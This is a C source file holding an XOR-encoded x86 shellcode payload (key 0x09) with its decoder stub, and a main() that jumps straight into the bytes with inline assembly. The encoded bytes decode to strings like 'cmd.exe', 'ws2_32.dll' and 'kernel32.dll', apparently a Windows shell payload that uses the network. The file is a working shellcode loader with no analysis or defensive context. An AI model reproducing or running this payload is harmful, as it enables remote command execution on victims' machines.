//生成的数据
//

// 小序
#define   ShellCodeSize  0x78,0x02
#define   EncodeKey      0x09
char bExploitEncode[] = {

	//0x33,0xC0,0xE8,0xFF,	0xFF,0xFF,0xFF,0xC3,	0x58,0x8D,0x70,0x1B,	0x33,0xC9,0x66,0xB9,
	//ShellCodeSize,0x8A,0x04,	0x0E,0x34,0x02,0x88,	0x04,0x0E,0xE2,0xF6,	0x80,0x34,0x0E,EncodeKey,
	//0xFF,0xE6,


	0x33,0xC0,0xE8,0xFF,	0xFF,0xFF,0xFF,0xC3,	0x58,0x8D,0x70,0x1B,	0x33,0xC9,0x66,0xB9,
	0x78,0x02,0x8A,0x04,	0x0E,0x34,0x02,0x88,	0x04,0x0E,0xE2,0xF6,	0x80,0x34,0x0E,0x09,
	0xFF,0xE6,


	/*ShellCode部分  大小 0x0278, key 0x09 */
	0x8a,0xe5,0x29,0x5c, 0x82,0xe5,0x8a,0xe5, 0x19,0xe2,0x29,0x6a, 0x64,0x6d,0x27,0x6c,
	0x71,0x6c,0x09,0x7e, 0x7a,0x3b,0x56,0x3a, 0x3b,0x27,0x6d,0x65, 0x65,0x09,0x62,0x6c,
	0x7b,0x67,0x6c,0x65, 0x3a,0x3b,0x27,0x6d, 0x65,0x65,0x09,0xe1, 0x09,0x09,0x09,0x09,
	0x52,0x80,0x54,0xf5, 0x6d,0x82,0x3c,0x39, 0x09,0x09,0x09,0x82, 0x7f,0x05,0x82,0x7f,

	0x15,0x82,0x3f,0x82, 0x5f,0x01,0x5b,0x61, 0x8e,0x3b,0xd1,0xc9, 0xe1,0xb4,0x08,0x09,
	0x09,0x82,0xf1,0x84, 0x7a,0xe7,0x63,0x09, 0x63,0x09,0x5f,0xf6, 0xde,0x80,0x4c,0xf1,
	0x84,0x7a,0xea,0x63, 0x09,0x63,0x09,0x5f, 0xf6,0xde,0x80,0x4c, 0xfd,0xf6,0x7c,0xfd,
	0xf6,0x7c,0xf1,0xf6, 0x7c,0xf5,0xe1,0x1d, 0x09,0x09,0x09,0xf6, 0x7c,0xf1,0x61,0x6a,

	0x80,0xd8,0x46,0xe1, 0x8f,0x08,0x09,0x09, 0x63,0x09,0xf6,0xd9, 0x82,0xec,0x54,0x5c,
	0x82,0xe5,0x88,0xe5, 0x09,0x0a,0x09,0x09, 0xf6,0x7c,0x19,0x61, 0x34,0x63,0xbd,0x89,
	0xe1,0x60,0x08,0x09, 0x09,0x84,0xbc,0x09, 0xf4,0xf6,0xf6,0x5f, 0x61,0x29,0x29,0x09,
	0x09,0xf6,0xd9,0x8c, 0xc9,0x06,0x8c,0xf6, 0x09,0x09,0x09,0xf6, 0x7c,0x19,0x61,0x24,

	0x3b,0x71,0xd7,0xe1, 0x4f,0x08,0x09,0x09, 0x63,0x09,0x63,0x09, 0x63,0x09,0x63,0x0f,
	0x63,0x08,0x63,0x0b, 0xf6,0xd9,0x80,0x4c, 0xf5,0xf6,0x7c,0x19, 0x61,0x6d,0x19,0xae,
	0xd4,0xe1,0x21,0x08, 0x09,0x09,0x6f,0xce, 0x8c,0x09,0xf7,0xf6, 0xf6,0x0b,0x09,0x6f,
	0xce,0x8c,0x0b,0xf7, 0xf6,0xf6,0x0c,0xe2, 0xce,0x8c,0x0d,0xf7, 0xf6,0xf6,0x09,0x09,

	0x09,0x09,0x84,0xbc, 0x09,0xf7,0xf6,0xf6, 0x63,0x1d,0x5f,0xf6, 0x7c,0xf5,0xf6,0xd9,
	0x8c,0xc9,0x06,0x8c, 0xab,0x09,0x09,0x09, 0xf6,0x7c,0x19,0x61, 0x05,0x96,0xda,0x42,
	0xe1,0xe0,0x09,0x09, 0x09,0x61,0xf6,0xf6, 0xf6,0x76,0xf6,0x7c, 0xf5,0xf6,0xd9,0x8c,
	0xc9,0x06,0x8c,0x8a, 0x09,0x09,0x09,0xf6, 0x7c,0x19,0x61,0xb8, 0x17,0x9e,0x08,0xe1,

	0xc3,0x09,0x09,0x09, 0x63,0x09,0x63,0x09, 0xf6,0x7c,0xf5,0xf6, 0xd9,0x80,0x4c,0xf5,
	0xf6,0x7c,0x05,0x61, 0xc0,0xb5,0xaf,0x62, 0xe1,0xb8,0x09,0x09, 0x09,0x82,0xd9,0x84,
	0xb4,0x79,0xf6,0xf6, 0xf6,0xb0,0x18,0x09, 0x09,0x09,0xb1,0x09, 0x09,0x09,0x09,0xf5,
	0xfa,0xa2,0xce,0x8c, 0x79,0xf6,0xf6,0xf6, 0x4d,0x09,0x09,0x09, 0xce,0x4c,0x95,0x09,

	0x08,0x09,0x09,0x6f, 0xce,0x4c,0xa9,0x09, 0x09,0x82,0x7c,0xf5, 0x80,0x7c,0xa1,0x80,
	0x7c,0xa5,0x80,0x7c, 0xb9,0x84,0xbc,0x79, 0xf6,0xf6,0xf6,0x84, 0xb4,0x09,0xf7,0xf6,
	0xf6,0x82,0x54,0x01, 0x84,0x52,0xd2,0x5e, 0x5f,0x63,0x09,0x63, 0x09,0x63,0x09,0x63,
	0x08,0x63,0x09,0x63, 0x09,0x5a,0x63,0x09, 0xf6,0xdb,0x82,0xec, 0x54,0xcb,0x05,0x09,

	0x5c,0x82,0xe5,0x8a, 0xe5,0x0d,0xce,0x4c, 0xf5,0x09,0x09,0x09, 0x09,0x5a,0x58,0x5b,
	0x82,0x7c,0x01,0x3a, 0xc0,0x3a,0xc9,0x83, 0x0d,0x07,0x8d,0xc9, 0x7d,0x1f,0x82,0x54,
	0xf5,0xc8,0xea,0x10, 0x82,0x5c,0xf5,0xc8, 0xe3,0x0e,0x02,0xd3, 0x0a,0xd1,0x80,0x54,
	0xf5,0x48,0xe2,0xea, 0x82,0x54,0x05,0x82, 0x5c,0xf5,0x3a,0xc9, 0x32,0xd3,0x7c,0x0c,

	0xb1,0x08,0x09,0x09, 0x09,0x53,0x50,0x52, 0x82,0xec,0x54,0xcb, 0x01,0x09,0x5c,0x82,
	0xe5,0x8a,0xe5,0x05, 0x5b,0x82,0x5c,0x05, 0x82,0x7b,0x35,0x84, 0x3d,0x3b,0x82,0x7f,
	0x71,0x84,0x3d,0x3b, 0x82,0x77,0x15,0x84, 0x35,0x33,0x80,0x74, 0xf5,0x82,0x77,0x29,
	0x84,0x35,0x33,0x80, 0x74,0xf1,0x82,0x77, 0x2d,0x84,0x35,0x33, 0x80,0x74,0xfd,0x3a,

	0xc0,0xe2,0x08,0x48, 0x82,0x7c,0xf1,0x82, 0x3d,0x87,0x82,0x5c, 0x05,0x84,0x3d,0x3b,
	0xf6,0x7c,0x01,0x5f, 0xe1,0x6e,0xf6,0xf6, 0xf6,0x8c,0xc9,0x7d, 0xef,0x82,0x7c,0xfd,
	0x3a,0xf6,0x6f,0x82, 0x35,0x47,0x82,0x5c, 0xf5,0x82,0x3d,0xb3, 0x82,0x5c,0x05,0x84,
	0x0d,0x3b,0x53,0x82, 0xec,0x54,0xcb,0x01


};  




void main()
{

	//ShellCode的调用
	__asm {
		lea    eax, bExploitEncode
			push   eax
			ret
	}

}